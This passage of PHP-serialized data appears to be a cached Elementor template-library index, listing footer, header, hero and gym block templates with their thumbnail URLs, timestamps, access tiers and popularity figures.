l\";i:642;s:2:\"id\";i:4676;s:5:\"title\";s:8:\"Footer 7\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2018/03/footer_7.png\";s:12:\"tmpl_created\";i:1522014215;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/footer_7/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:10:\"[\"Footer\"]\";s:10:\"menu_order\";i:338;s:16:\"popularity_index\";i:237;s:11:\"trend_index\";i:346;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:593;a:21:{s:4:\"tmpl\";i:637;s:2:\"id\";i:7627;s:5:\"title\";s:8:\"Footer 8\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/footer_hero_1.png\";s:12:\"tmpl_created\";i:1521547332;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/footer-8/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:10:\"[\"Footer\"]\";s:10:\"menu_order\";i:340;s:16:\"popularity_index\";i:100;s:11:\"trend_index\";i:83;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:594;a:21:{s:4:\"tmpl\";i:638;s:2:\"id\";i:7638;s:5:\"title\";s:8:\"Footer 9\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/footer_hero_2.png\";s:12:\"tmpl_created\";i:1521547502;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/footer-9/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:10:\"[\"Footer\"]\";s:10:\"menu_order\";i:342;s:16:\"popularity_index\";i:124;s:11:\"trend_index\";i:147;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:595;a:21:{s:4:\"tmpl\";i:888;s:2:\"id\";i:11424;s:5:\"title\";s:3:\"GYM\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2019/08/404_Small.png\";s:12:\"tmpl_created\";i:1567393309;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/gym-5/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:13:\"[\"404\",\"Gym\"]\";s:10:\"menu_order\";i:344;s:16:\"popularity_index\";i:679;s:11:\"trend_index\";i:769;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:596;a:21:{s:4:\"tmpl\";i:887;s:2:\"id\";i:11435;s:5:\"title\";s:3:\"GYM\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2019/08/Archiv_Small.png\";s:12:\"tmpl_created\";i:1567393296;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/gym-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:7:\"[\"Gym\"]\";s:10:\"menu_order\";i:346;s:16:\"popularity_index\";i:441;s:11:\"trend_index\";i:507;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:597;a:21:{s:4:\"tmpl\";i:886;s:2:\"id\";i:11445;s:5:\"title\";s:3:\"GYM\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2019/08/Post_Small.png\";s:12:\"tmpl_created\";i:1567393229;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/gym-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:7:\"[\"Gym\"]\";s:10:\"menu_order\";i:349;s:16:\"popularity_index\";i:452;s:11:\"trend_index\";i:479;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:598;a:21:{s:4:\"tmpl\";i:885;s:2:\"id\";i:11453;s:5:\"title\";s:3:\"GYM\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2019/08/Footer_Small.png\";s:12:\"tmpl_created\";i:1567393224;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/blocks/gym-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:16:\"[\"Footer\",\"Gym\"]\";s:10:\"menu_order\";i:351;s:16:\"popularity_index\";i:270;s:11:\"trend_index\";i:331;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:599;a:21:{s:4:\"tmpl\";i:884;s:2:\"id\";i:11461;s:5:\"title\";s:3:\"GYM\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2020/06/Header-gym-and-fitness.png\";s:12:\"tmpl_created\";i:1567393219;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/blocks/gym/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:16:\"[\"Gym\",\"Header\"]\";s:10:\"menu_order\";i:352;s:16:\"popularity_index\";i:201;s:11:\"trend_index\";i:135;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:600;a:21:{s:4:\"tmpl\";i:635;s:2:\"id\";i:7596;s:5:\"title\";s:8:\"Header 1\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/header350.12.jpg\";s:12:\"tmpl_created\";i:1521546999;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/header-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:10:\"[\"Header\"]\";s:10:\"menu_order\";i:354;s:16:\"popularity_index\";i:33;s:11:\"trend_index\";i:17;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:601;a:21:{s:4:\"tmpl\";i:663;s:2:\"id\";i:7801;s:5:\"title\";s:9:\"header 10\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/header350.9.jpg\";s:12:\"tmpl_created\";i:1524583659;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/header-10/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:356;s:16:\"popularity_index\";i:51;s:11:\"trend_index\";i:14;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:602;a:21:{s:4:\"tmpl\";i:658;s:2:\"id\";i:7812;s:5:\"title\";s:9:\"header 11\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/header350.10.jpg\";s:12:\"tmpl_created\";i:1524583298;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/header-11/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:358;s:16:\"popularity_index\";i:96;s:11:\"trend_index\";i:103;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:603;a:21:{s:4:\"tmpl\";i:657;s:2:\"id\";i:7825;s:5:\"title\";s:9:\"header 12\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/header350.11.jpg\";s:12:\"tmpl_created\";i:1524583273;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/header-12/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:360;s:16:\"popularity_index\";i:63;s:11:\"trend_index\";i:75;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:604;a:21:{s:4:\"tmpl\";i:694;s:2:\"id\";i:9127;s:5:\"title\";s:9:\"header 13\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2018/07/Header_get_started_1200V3.png\";s:12:\"tmpl_created\";i:1532428699;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/header-13/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:362;s:16:\"popularity_index\";i:61;s:11:\"trend_index\";i:58;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:605;a:21:{s:4:\"tmpl\";i:636;s:2:\"id\";i:7615;s:5:\"title\";s:8:\"Header 2\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/header350.1.jpg\";s:12:\"tmpl_created\";i:1521547237;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/header-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:10:\"[\"Header\"]\";s:10:\"menu_order\";i:365;s:16:\"popularity_index\";i:30;s:11:\"trend_index\";i:33;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:606;a:21:{s:4:\"tmpl\";i:665;s:2:\"id\";i:7713;s:5:\"title\";s:8:\"header 3\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/header350.2.jpg\";s:12:\"tmpl_created\";i:1524584780;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/header-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:367;s:16:\"popularity_index\";i:43;s:11:\"trend_index\";i:28;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:607;a:21:{s:4:\"tmpl\";i:659;s:2:\"id\";i:7724;s:5:\"title\";s:8:\"header 4\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/header350.3.jpg\";s:12:\"tmpl_created\";i:1524583367;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/header-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:369;s:16:\"popularity_index\";i:24;s:11:\"trend_index\";i:13;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:608;a:21:{s:4:\"tmpl\";i:660;s:2:\"id\";i:7734;s:5:\"title\";s:8:\"header 5\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/header350.4.jpg\";s:12:\"tmpl_created\";i:1524583436;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/header-5/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:371;s:16:\"popularity_index\";i:36;s:11:\"trend_index\";i:18;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:609;a:21:{s:4:\"tmpl\";i:666;s:2:\"id\";i:7744;s:5:\"title\";s:8:\"Header 6\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/header350.5.jpg\";s:12:\"tmpl_created\";i:1524584784;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/header-6/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:372;s:16:\"popularity_index\";i:65;s:11:\"trend_index\";i:94;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:610;a:21:{s:4:\"tmpl\";i:664;s:2:\"id\";i:7754;s:5:\"title\";s:8:\"header 7\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/header350.6.jpg\";s:12:\"tmpl_created\";i:1524583712;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/header-7/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:375;s:16:\"popularity_index\";i:111;s:11:\"trend_index\";i:143;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:611;a:21:{s:4:\"tmpl\";i:661;s:2:\"id\";i:7771;s:5:\"title\";s:8:\"header 8\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/header350.7.jpg\";s:12:\"tmpl_created\";i:1524583540;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/header-8/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:376;s:16:\"popularity_index\";i:91;s:11:\"trend_index\";i:60;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:612;a:21:{s:4:\"tmpl\";i:662;s:2:\"id\";i:7787;s:5:\"title\";s:8:\"header 9\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/header350.8.jpg\";s:12:\"tmpl_created\";i:1524583598;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/header-9/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:379;s:16:\"popularity_index\";i:102;s:11:\"trend_index\";i:78;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:613;a:21:{s:4:\"tmpl\";i:572;s:2:\"id\";i:6266;s:5:\"title\";s:6:\"Hero 1\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/heroo_black_4.png\";s:12:\"tmpl_created\";i:1520443695;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/hero-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:8:\"[\"hero\"]\";s:10:\"menu_order\";i:380;s:16:\"popularity_index\";i:52;s:11:\"trend_index\";i:35;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:614;a:21:{s:4:\"tmpl\";i:528;s:2:\"id\";i:5783;s:5:\"title\";s:7:\"Hero 10\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2018/03/header_2.png\";s:12:\"tmpl_created\";i:1520443586;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/hero-10/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:383;s:16:\"popularity_index\";i:365;s:11:\"trend_index\";i:567;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:615;a:21:{s:4:\"tmpl\";i:527;s:2:\"id\";i:5773;s:5:\"title\";s:7:\"Hero 11\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2018/03/header_1.png\";s:12:\"tmpl_created\";i:1520443584;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/hero-11/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:384;s:16:\"popularity_index\";i:39;s:11:\"trend_index\";i:179;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:616;a:21:{s:4:\"tmpl\";i:479;s:2:\"id\";i:5238;s:5:\"title\";s:7:\"Hero 12\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/form_white_4.png\";s:12:\"tmpl_created\";i:1520443468;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/hero-12/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:8:\"[\"hero\"]\";s:10:\"menu_order\";i:386;s:16:\"popularity_index\";i:611;s:11:\"trend_index\";i:555;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:617;a:21:{s:4:\"tmpl\";i:573;s:2:\"id\";i:6274;s:5:\"title\";s:6:\"Hero 2\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/heroo_black_5.png\";s:12:\"tmpl_created\";i:1520443698;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/hero-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:8:\"[\"hero\"]\";s:10:\"menu_order\";i:389;s:16:\"popularity_index\";i:87;s:11:\"trend_index\";i:88;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:618;a:21:{s:4:\"tmpl\";i:569;s:2:\"id\";i:6239;s:5:\"title\";s:6:\"Hero 3\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/heroo_black_1.png\";s:12:\"tmpl_created\";i:1520443689;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/hero-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:8:\"[\"hero\"]\";s:10:\"menu_order\";i:391;s:16:\"popularity_index\";i:23;s:11:\"trend_index\";i:34;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:619;a:21:{s:4:\"tmpl\";i:571;s:2:\"id\";i:6258;s:5:\"title\";s:6:\"Hero 4\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/heroo_black_3.png\";s:12:\"tmpl_created\";i:1520443693;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/hero-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:8:\"[\"hero\"]\";s:10:\"menu_order\";i:393;s:16:\"popularity_index\";i:479;s:11:\"trend_index\";i:470;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:620;a:21:{s:4:\"tmpl\";i:570;s:2:\"id\";i:6249;s:5:\"title\";s:6:\"Hero 5\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/heroo_black_2.png\";s:12:\"tmpl_created\";i:1520443691;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/hero-5/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:8:\"[\"hero\"]\";s:10:\"menu_order\";i:395;s:16:\"popularity_index\";i:56;s:11:\"trend_index\";i:85;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:621;a:21:{s:4:\"tmpl\";i:568;s:2:\"id\";i:6230;s:5:\"title\";s:6:\"Hero 